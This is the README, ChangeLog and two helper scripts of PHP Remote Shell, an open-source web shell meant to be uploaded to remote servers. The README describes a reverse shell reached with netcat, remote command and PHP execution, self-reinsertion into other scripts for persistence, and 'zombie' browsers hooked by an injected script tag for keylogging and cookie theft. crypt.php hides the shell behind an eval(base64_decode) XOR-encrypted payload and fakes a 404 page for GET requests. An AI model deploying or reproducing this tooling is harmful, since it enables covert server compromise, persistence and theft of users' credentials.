README.md
# PHP Remote Shell

[Project homepage](https://phpremoteshell.esaracco.fr)

PHP Remote Shell is a Swiss army knife for exploring servers via the Web. It contains a reverse shell in PHP, a full file browser, the ability to execute shell commands or PHP / SQL / LDAP code, crontab management and « zombies » management. It can also nest itself in existing files in order to redeploy automatically during their execution. If it has been previously encrypted, it is able to decrypt itself on the fly.

It was designed to be robust and work with just about any POSIX server with a decent version of PHP. It may look a bit rustic at times, but it should work everywhere.

PHP Remote Shell will be as silent as possible, using only POST requests, displaying images using inline data, keeping session in its own file instead of cookies when possible, and so on.

## Requirement

You need a POSIX machine with PHP CLI on local, and a POSIX server with a PHP web service up on remote.

## Installation
If you retrieved PRS by cloning the Git repository, you first need to change the permissions of some files as follows :
```bash
chmod +x encryption/crypt.php strip/strip.php
```
To install and use PRS you just have to put `prs.php` somewhere on the Web and access it with a POST request (GET requests will display a HTTP 404 error).

The simplest way to request PRS URL once uploaded is to open `launcher.html` with a web browser and fill the form.

You can use PRS _as is_ or you can encrypt it before uploading it on the remote host. Encryption is a guaranty for you that nobody will read the source code neither your authentication parameters if any. Knowing this, you can add what you want in it, your secrets will be well protected, even on remote :-)

To encrypt the script, go to `encryption/` and execute `./crypt.php yourpasswd`. The final encrypted `prs.php` file will be created in the same directory. This is the file to upload on remote host.

The `launcher.html` file allow you to specify your encryption password before requesting the PRS page.

To force PRS to ask for authentication, edit the script and fill the `Authentication` section constants.

To allow direct download of PRS file, just pass it `prsds=` as URL parameter :

```
http://remote-server/prs.php?prsds=
```

_Note that this will not work if you previously defined `CHECK_AUTH` or if you have encrypted PRS file_.

The original script name of PRS is `prs.php` but you can rename it as you want !

## Usage

### Edit

Allow you to open the `Profiles management` popup to save sessions and retrieve them later.

### Remote information

Displays the result of some common tools, plus the output of the `phpinfo()` function if available.

### Shell

#### Reverse shell

If the remote PHP allows it, let you choose a remote IP and port on which listening with a full PHP reverse shell.

It is just a basic shell, which means that sometimes it will not work and that the connection may be cut of or looped at any time. Some commands will be rewritten (like `ping` or `top`), others will be emulated (like `clear`). It is likely that in dying (when you grab the `shutdown` command from your client) it causes a zombie process.

Use `netcat` or any other client on your local machine to execute bash commands on the remote host.

```bash
you@local~$ nc 192.168.3.5 4000
PRS reverse shell 0.12.1
'quit' to quit, 'shutdown' to kill, 'help' for this help
www-data@192.168.3.5 /var/wwww$
```

#### Command execution

Sometime, reverse shell is not possible. This section allows you to execute bash commands and see their results directly from the PRS web page.

### PHP code

With this feature, you can write PHP code, execute it on the remote host and see the result.

### File browser

PRS file browser allows you a lot of things. You can create/edit/delete files, view symlinks and so on. It looks a lot like the output of the `ls` command, with some improvements.

#### Host me in

This feature of the file browser bottom menu allows you to « host » PRS on another PHP script. If someone ever erases it, it would be automatically recreated by calling this page.

### Crontab

Where possible, it allows you to edit, save or even remove the crontab of the current web user.

### Zombies

_This feature will not work if PRS file has been previously encrypted._ Use it only for fun and non-profit ;-)

You can have fun spying remote user's keyboard, injecting code, stealing cookies and so on. You can also web ping hosts on user's private network before launching CSRF attack for example. But, once again : it is instable, not stealth...

To create a zombie, inject the following HTML code in a web page :
```html
<script src="http://remote-server/prs.php?z=js"></script>
```
Then go to the PRS `Zombies` menu and wait until it appears on the list.

### SQL / LDAP

This menu allows you to access remote SQL or LDAP database assuming you know their access settings. For now it can manage MySQL (`mysql`, `mysqli`, `pdo_mysql`), PostgreSQL (`pgsql`, `pdo_pgsql`) and LDAP. It offers some basic macros, but most of the work will have to be done in SQL.

## License
GPL


ChangeLog
2019-07-01 Emmanuel Saracco <esaracco@users.labs.libre-entreprise.org>

	* Version: 0.12.2

	* Zombies:

	  - Keylogger improvement.

	* Other:

	  - A bit of cosmetics and optimizations.
	  - Safer current URL detection.
	  - Improvement of public IP detection and display of the remote
	    information.

2019-06-05 Emmanuel Saracco <emmanuel@esaracco.fr>

	* phpremoteshell is now hosted on GitHub.

2019-06-04 Emmanuel Saracco <esaracco@users.labs.libre-entreprise.org>

	* Version: 0.12.1

	* SQL shell:

	  - Added PDO MySQL support.
	  - Added PDO PostgreSQL support.
	  - Fixed MySQL support detection.

	* Crontab:

	  - Fixed crontab detection.

	* Reverse shell:

	  - Fixed reverse shell editors detection.

2019-06-03 Emmanuel Saracco <esaracco@users.labs.libre-entreprise.org>

	* Version: 0.12

	* Reverse shell:

	  - Added real PHP reverse shell on remote hosts that support it.

	* Other:

	  - Big rewriting and debug (especially on the file browser)... There
	    is still a lot of work to be done, but it always works better
	    than before :-)

2008-12-06 Emmanuel Saracco <esaracco@users.labs.libre-entreprise.org>

	* Version: 0.11

	* LDAP shell:

	  - Results display enhancements.

2008-12-05 Emmanuel Saracco <esaracco@users.labs.libre-entreprise.org>

	* LDAP shell:

	  - Added Dump feature (for DNs and their subtree).
	  - Fixed a problem with UTF-8.

	* Other:

	  - Javascript cleaning.

2008-12-04 Emmanuel Saracco <esaracco@users.labs.libre-entreprise.org>

	* LDAP shell:

	  - LDIF LDAP support.

2008-12-02 Emmanuel Saracco <esaracco@users.labs.libre-entreprise.org>

	* LDAP shell:

	  - Added basic LDAP support. Still a work in progress.

2008-11-30 Emmanuel Saracco <esaracco@users.labs.libre-entreprise.org>

	* SQL shell:

	  - Now one can get per table dump.
	  - Now one can get full database dump.
	  - First steps of a SQL shell for both PostgreSQL and MySQL.

2008-11-29 Emmanuel Saracco <esaracco@users.labs.libre-entreprise.org>

	* Other:

	  - Some code cleaning.
	  - Smarter PRS launcher.

2008-11-28 Emmanuel Saracco <esaracco@users.labs.libre-entreprise.org>

	* Other:

	  - There was a problem of information exposure with the "direct
	    download" feature introduced in 0.10 :-) It should be fixed now,
	    but I need some more tests.

2008-11-27 Emmanuel Saracco <esaracco@users.labs.libre-entreprise.org>

	* Version: 0.10

	* Other:

	  - Now PRS can be downloaded directly by passing "prsds=" URL
	    parameter when calling it. Note that this feature will not work
	    if you previously defined authentication to true, or if you have
	    encrypted it.
	  - Fixed a lot of problems with PRS remote inclusion. Now, it can
	    easily be included remotely by exploiting require*/include* calls.
	  - Added a script to strip PRS from comments and useless spaces.
	    Also this script is automatically used before PRS encryption.
	  - Added some new displayed informations: client IP, vhost IP and
	    remote routing table.

2008-07-18 Emmanuel Saracco <esaracco@users.labs.libre-entreprise.org>

	* File browser:

	  - File rights detection cleaning.
	  - Fixed a problem with "Display options" box.

2008-06-10 Emmanuel Saracco <esaracco@users.labs.libre-entreprise.org>

	* Version: 0.9.0

2008-05-25 Emmanuel Saracco <esaracco@users.labs.libre-entreprise.org>

	* Other:

	  - Added a PHP error console. Can be useful when working on servers
	    with strange behaviour, to understand what is happening.
	  - Now all files and directories are created 0666 and 0777 when
	    server allow it.

	* File browser:

	  - Fixed some problems with IE6.

2008-05-21 Emmanuel Saracco <esaracco@users.labs.libre-entreprise.org>

	* Other:

	  - Display a alert message to the user when PRS can not self-removing
	    itself from the server.

2008-05-20 Emmanuel Saracco <esaracco@users.labs.libre-entreprise.org>

	* Zombies:

	  - Added a Javascript console. It is now possible to send custom
	    javascript to zombie.
	  - Some Ajax enhancement.
	  - Fixed a problem with file path construction.

2008-04-24 Emmanuel Saracco <esaracco@users.labs.libre-entreprise.org>

	* Remote shell:
	  
	  - Added command reset button.
	  - Added history reset button.

2008-03-28 Emmanuel Saracco <esaracco@users.labs.libre-entreprise.org>

	* Version: 0.8.2

2008-03-27 Emmanuel Saracco <esaracco@users.labs.libre-entreprise.org>

	* Other:

	  - Fixed a problem with some particular servers and tmpdir detection. 
	    Some servers allow directory creation, but not directory 
	    deletion... So, now zombies management should work on these 
	    servers too.

2008-03-26 Emmanuel Saracco <esaracco@users.labs.libre-entreprise.org>

	* Other:

	  - Fixed a logic error, which could prevent PRS to detect the
	    correct storage mode.

2008-03-21 Emmanuel Saracco <esaracco@users.labs.libre-entreprise.org>

	* File browser:

	  - Fixed a problem with rights detections.

	* Other:

	  - Fixed a problem with executable method detection.

2007-12-22 Emmanuel Saracco <esaracco@users.labs.libre-entreprise.org>

	* Version: 0.8.1

2007-12-15 Emmanuel Saracco <esaracco@users.labs.libre-entreprise.org>

	* Zombies:

	  - Fixed some issues with IE.
	  - Added the use of hidden iframe to spy user navigation. This
	    feature does not work yet with IE, so it can be enabled/disabled
	    using the ZOMBIE_USE_HIDDEN_IFRAME constant.

2007-12-11 Emmanuel Saracco <esaracco@users.labs.libre-entreprise.org>

	* File browser:

	  - Added display options (to filter hidden files, directories,
	    symlinks or files)
	  - Colors enhancement.
	  - Sort enhancement (same sort, whatever browse method is used).
	

2007-12-10 Emmanuel Saracco <esaracco@users.labs.libre-entreprise.org>

	* Version: 0.8.0

2007-12-08 Emmanuel Saracco <esaracco@users.labs.libre-entreprise.org>

	* Other:

	  - Better safe mode handling.
	  - Better recursive directory deletion.

2007-12-07 Emmanuel Saracco <esaracco@users.labs.libre-entreprise.org>

	* Zombies:


strip/strip.php
#!/usr/bin/php
<?php
/*
 * Copyright (C) 2008
 * Emmanuel Saracco <emmanuel@esaracco.fr>
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330,
 * Boston, MA 02111-1307, USA.
 */

if ($argc > 1)
{
  display_help ();
  exit (0);
}

system ('php -w ../prs.php > prs.php');
$d = file_get_contents ('prs.php');
$d = preg_replace ('/<\?php  \?>/', "<?php
/* PRSDATA

*/
?>", $d);
file_put_contents ('prs.php', $d);

?>

	* Previous size was : <?php echo filesize ('../prs.php')?> bytes
	* New size is : <?php echo filesize ('prs.php')?> bytes
	* Input file was : ../prs.php
	* Output file is : ./prs.php

<?php

function display_help ()
{
?>

	Syntax: ./strip.php
	Strip PRS file for comments and spaces

<?php
}
?>


encryption/crypt.php
#!/usr/bin/php
<?php
/*
 * Copyright (C) 2005-2019
 * Emmanuel Saracco <emmanuel@esaracco.fr>
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330,
 * Boston, MA 02111-1307, USA.
 */

if ($argc < 2)
{
  display_help ();
  exit (0);
}

$k = $argv[1];
system ('../strip/strip.php >/dev/null');
rename ('prs.php', 'prs-stripped.php');
$data = file_get_contents ('prs-stripped.php');
$data = preg_replace ('#^\s*<\?(php)?#', '', $data);
$data = preg_replace ('#\?>\s*$#', '', $data);
$data = encrypt ($data, $k);
$data = '@eval(decrypt(base64_decode("'.base64_encode($data).'"),rtrim((isset($_POST["cryptkey"]))?$_POST["cryptkey"]:$argv[3])));function keyED($txt,$encrypt_key){$encrypt_key = md5($encrypt_key);$ctr=0;$tmp=\'\';for ($i=0;$i<strlen($txt);$i++){if($ctr==strlen($encrypt_key))$ctr=0;$tmp.=substr($txt,$i,1)^substr($encrypt_key,$ctr,1);$ctr++;}return $tmp;}function decrypt($txt,$key){$txt=keyED($txt,$key);$tmp=\'\';for($i=0;$i<strlen($txt);$i++){$md5 = substr($txt,$i,1);$i++;$tmp.=(substr($txt,$i,1)^$md5);}return $tmp;}';

$data = '<?php error_reporting(0); ini_set(\'display_errors\', 0); if (php_sapi_name () != \'cli\' && $_SERVER[\'REQUEST_METHOD\']!=\'POST\'){header (\'HTTP/1.1 404 Not Found\');print"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL {$_SERVER[\'REQUEST_URI\']} was not found on this server.</p><hr>{$_SERVER[\'SERVER_SIGNATURE\']}</body></html>";exit ();} @eval(@base64_decode("' . base64_encode ($data) . '")) ?>';
file_put_contents ('prs.php', $data);
unlink ('prs-stripped.php');
?>

	* Given key was  : <?php echo $k?> 
	* Input file was : ../prs.php
	* Output file is : ./prs.php

	File has been stripped before being encrypted.

	Use the "launcher.html" HTML page to request PRS encrypted file.
	Just open it in a Web browser.

<?php

function display_help ()
{
?>

	Syntax: ./crypt.php KEY
	Encrypt PRS file with the given key

	Encrypted file should be uploaded on a server and requested using POST 
	method to submit the key used for encryption. 
	Once the file has been encrypted you can use the "launcher.html" HTML
	page to request it. Just open it in a Web browser.

<?php
}

function encrypt ($txt, $key) 
{ 
  srand ((double) microtime () * 1000000); 
  $encrypt_key = md5 (rand (0,32000)); 
  $ctr = 0; 
  $tmp = ''; 
  for ($i = 0; $i < strlen ($txt); $i++) 
  { 
    if ($ctr == strlen ($encrypt_key)) $ctr = 0; 
    $tmp.= substr($encrypt_key, $ctr, 1) .
                  (substr ($txt, $i, 1) ^ substr ($encrypt_key, $ctr, 1)); 
    $ctr++; 
  } 
  return keyED ($tmp, $key); 
}

function keyED ($txt, $encrypt_key) 
{ 
  $encrypt_key = md5 ($encrypt_key); 
  $ctr = 0; 
  $tmp = ''; 
  for ($i = 0; $i < strlen ($txt); $i++) 
  { 
    if ($ctr == strlen ($encrypt_key)) $ctr = 0; 
    $tmp .= substr ($txt, $i, 1) ^ substr ($encrypt_key, $ctr, 1); 
    $ctr++; 
  } 
  return $tmp; 
}
?>
